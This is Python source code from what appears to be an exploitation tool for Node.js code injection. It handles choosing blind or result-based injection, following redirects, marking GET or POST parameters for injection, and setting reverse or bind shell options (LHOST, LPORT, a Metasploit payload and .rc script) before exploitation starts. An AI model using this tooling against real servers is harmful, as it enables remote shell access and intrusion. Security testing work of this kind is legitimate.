def change_technique(prompt_message, options_message, alter_tech_msg,
current_tech_msg):
try:
if settings.print_info == 1:
prompt_message += options_message
answer = prompt.yesOrNo(prompt_message, alter_tech_msg,
current_tech_msg)
print answer[0]
# Change technique
if answer[1] == 1:
if settings.technique == 'result': settings.technique = 'blind'
else: settings.technique = 'result'
return True
# Remain on same technique
elif answer[1] == 0:
return False
else:
return prompt.yesOrNo(prompt_message, current_tech_msg,
alter_tech_msg)
except Exception as e:
print(Fore.RED + "[!] ERROR: %s" % e)
verbosity.error_info(e)
def check_redirection(res, tech):
try:
# Do not show this message everytime you make a request on blind injection
if tech != 'blind':
message = Fore.YELLOW + '\n[<] Checking for redirection'
verbosity.print_message(message, settings.print_info)
# Redirection made
# Ask to follow..
if res.url != settings.url:
message = Fore.RED + Style.BRIGHT + '[!] WARNING: REDIRECTION FOUND!\n' + Style.NORMAL + Fore.WHITE + " from: " + Fore.GREEN + Style.BRIGHT + settings.url + "\n" + Style.NORMAL + Fore.WHITE + " to: " + Fore.RED + Style.BRIGHT + res.url
print message
# Ask to quit
prompt_message = Fore.WHITE + Style.BRIGHT + "[?] Do you want to follow redirection?\n"
options_message = Style.DIM + Fore.WHITE + "[-] Enter 'y' for 'yes' or 'n' for 'no'.\n"
if settings.print_info == 1:
prompt_message += options_message
error_msg = Fore.RED + '[-] Not follow redirection.'
continue_msg = Fore.WHITE + Style.NORMAL + '[-] Follow redirection.'
answer = prompt.yesOrNo(prompt_message, continue_msg, error_msg)
verbosity.print_message(answer[0], settings.print_info)
settings.follow_redirection = 1
# If follow redirection
if answer[1] == 1:
settings.url = res.url
settings.pre_url = settings.url
if settings.technique != 'blind':
message = Style.NORMAL + Fore.YELLOW + '[>]'
verbosity.print_message(message, settings.print_info)
# No redirection
else:
if tech != 'blind':
message = Style.DIM + Fore.WHITE + '[-] No redirection made.' #\n' + Fore.YELLOW + Style.NORMAL + '[>]'
verbosity.print_message(message, settings.print_info)
settings.follow_redirection = 0
return settings.follow_redirection
except Exception as e:
print(Fore.RED + "[!] ERROR: %s" % e)
verbosity.error_info(e)
sys.exit()
def checkPathExistenceInHomeDirectory(flag,path):
try:
print(Fore.YELLOW + "[i] Checking if path exist in home directory ...")
path = "%s/%s" %(settings.home_directory,path)
first_check = os.path.exists(path)
# Valid home directory path..
if first_check == True:
home_directory_select = prompt.yesOrNo("[?] Did you mean '%s' ?\n"%path + Fore.YELLOW + "[i] Enter 'y' for 'yes' or 'n' for 'no'.\n" + Fore.WHITE + " - ", Fore.GREEN + "[!] Setting path: '%s' = '%s'" %(flag,path), Fore.RED + "[!] Not setting path '%s' for '%s'" %(path,flag))
# Valid home directory path accepted
if home_directory_select[1] == 1:
return path
# Valid home directory path NOT accepted
else:
return 'None'
# Invalid home directory path..
else:
print(Fore.RED + "[!] ERROR: '%s' is not a valid path for '%s'" %(path,flag))
return 'None'
except Exception as e:
print(Fore.RED + "[!] ERROR: %s" %e)
verbosity.error_info(e)
def request_method():
try:
#POST & POST with GET PARAMETERS BLENDED!
if settings.pdata != 'None':
message = (Fore.GREEN + Style.BRIGHT + '[i] POST data found!')
verbosity.print_message(message, settings.print_info)
#tempurl_array = settings.url.split("/")
# check if both get and post inserted
if "?" in settings.url:
# Ask to remove query parameter(s)
prompt_message = Fore.WHITE + Style.BRIGHT + "[?] Query parameter(s) found on POST request. Do you want to remove query request(s) from URL?\n"
options_message = Style.DIM + Fore.WHITE + "[-] Enter 'y' for 'yes' or 'n' for 'no'.\n"
if settings.print_info == 1:
prompt_message += options_message
yes_message = Style.DIM + Fore.WHITE + "[-] Removing query parameters."
no_message = Style.DIM + Fore.WHITE + "[-] Continue with query parameters."
answer = prompt.yesOrNo(prompt_message, yes_message,
no_message)
# Remove case
if answer[1] == 1:
tempurl_array = settings.url.split("?")
url_length = len(tempurl_array) - 1
edited_url = concat_url(url_length, tempurl_array)
settings.url = edited_url
print answer[0]
message = (
Fore.WHITE + Style.DIM +
'[-] Will execute POST REQUESTS on "%s" with POST DATA "%s"' %
(settings.url, settings.pdata))
verbosity.print_message(message, settings.print_info)
# URL - (pre_url and url are the same on post scenario)
settings.pre_url = settings.url
# inject_here and pdata are the same on post scenario
settings.initial_inject_here = settings.pdata
settings.inject_here = settings.pdata
settings.initial_parameter = settings.pdata
settings.request_method = 1
#GET
else:
# split get parameters from url
print(Fore.GREEN + Style.BRIGHT + '[i] GET parameter found!')
message = (Style.DIM + Fore.WHITE +
'[-] Will execute GET REQUESTS on "' + settings.url +
'".')
verbosity.print_message(message, settings.print_info)
tempurl_array = settings.url.split("?")
# URL without the get parameters
settings.pre_url = tempurl_array[0]
# GET parameters - with [INJECT_HERE]
settings.initial_inject_here = tempurl_array[1]
settings.inject_here = tempurl_array[1]
# Whole URL - with [INJECT_HERE]
settings.initial_parameter = settings.url
settings.pdata = settings.initial_parameter
settings.request_method = 0
except Exception as e:
print(Fore.RED + "[!] ERROR: %s" % e)
verbosity.error_info(e)
def initialize_payload_options(start):
try:
# If some/all variables are not defined
message = Fore.YELLOW + '[<] Initialize exploitation variables.'
verbosity.print_message(message, settings.print_info)
# Reverse shell case
if settings.lhost == 'None' and settings.msf_payload != settings.msf_payload_bind:
message = Fore.RED + '[!] LHOST not defined!'
verbosity.print_message(message, settings.print_info)
settings.lhost = str(
payload_init.get_input(
"[?] Please, set your local host ip.\n - ", "LHOST"))
# Bind shell case
if settings.msf_payload == settings.msf_payload_bind:
rhost = settings.pre_url.rsplit(":", 1)
settings.prefix_rhost = rhost[0]
rhost_without_http = rhost[0].split("/")
settings.rhost = rhost_without_http[2]
message = Fore.GREEN + "[!] Setting automatically remote host: 'RHOST' = " + settings.rhost
verbosity.print_message(message, settings.print_info)
if settings.lport == 'None':
message = Fore.RED + '[!] LPORT not defined!'
verbosity.print_message(message, settings.print_info)
settings.lport = str(
payload_init.get_input("[?] Please, set your local port.\n - ",
"LPORT"))
else:
input_answer = settings.lport
settings.lport = payload_init.checkLPORT(input_answer)
if settings.payload_path == 0:
message = Fore.RED + '[!] PAYLOAD PATH not defined!'
verbosity.print_message(message, settings.print_info)
payload_path = payload_init.get_input(
"[?] Please, set the PAYLOAD PATH.\n - ", "PAYLOAD PATH")
settings.payload_path = '%s/nodejs_payload.js' % payload_path
settings.payload_path = re.sub(r"\/+", "/", settings.payload_path)
print settings.payload_path
else:
input_answer = settings.payload_path
payload_path = settings.payload_path
settings.payload_path = '%s/nodejs_payload.js' % payload_path
settings.payload_path = re.sub(r"\/+", "/", settings.payload_path)
if settings.rc_path == 0:
message = Fore.RED + '[!] .RC SCRIPT PATH not defined!'
verbosity.print_message(message, settings.print_info)
rc_path = payload_init.get_input(
"[?] Please, set the .RC SCRIPT PATH.\n - ", "RC SCRIPT PATH")
settings.rc_path = '%s/nodejs_payload.js' % rc_path
settings.rc_path = re.sub(r"\/+", "/", settings.rc_path)
print settings.rc_path
else:
input_answer = settings.rc_path
rc_path = settings.rc_path
settings.rc_path = '%s/nodejs_shell.rc' % rc_path
settings.rc_path = re.sub(r"\/+", "/", settings.rc_path)
if settings.encoding[0] == 'None':
message = Fore.RED + '[!] ENCODING not defined!'
verbosity.print_message(message, settings.print_info)
while settings.encoding[0] == 'None':
settings.encoding = prompt.yesOrNo(
"[?] Please, type a valid value for payload encoding.\n" +
Fore.YELLOW +
"[i] Enter 'y' for 'yes' or 'n' for 'no'.\n" + Fore.WHITE +
" - ", Fore.GREEN + "[i] Payload will be encoded..",
Fore.GREEN + "[i] Payload will be unecoded")
# End process
message = Fore.GREEN + '[!] Exploitation variables successfully defined!\n' + Fore.YELLOW + '[>]'
verbosity.print_message(message, settings.print_info)
if start == True:
start_exploitation()
except Exception as e:
print(e)
print(Fore.RED + "[!] ERROR: %s" % e)
verbosity.error_info(e)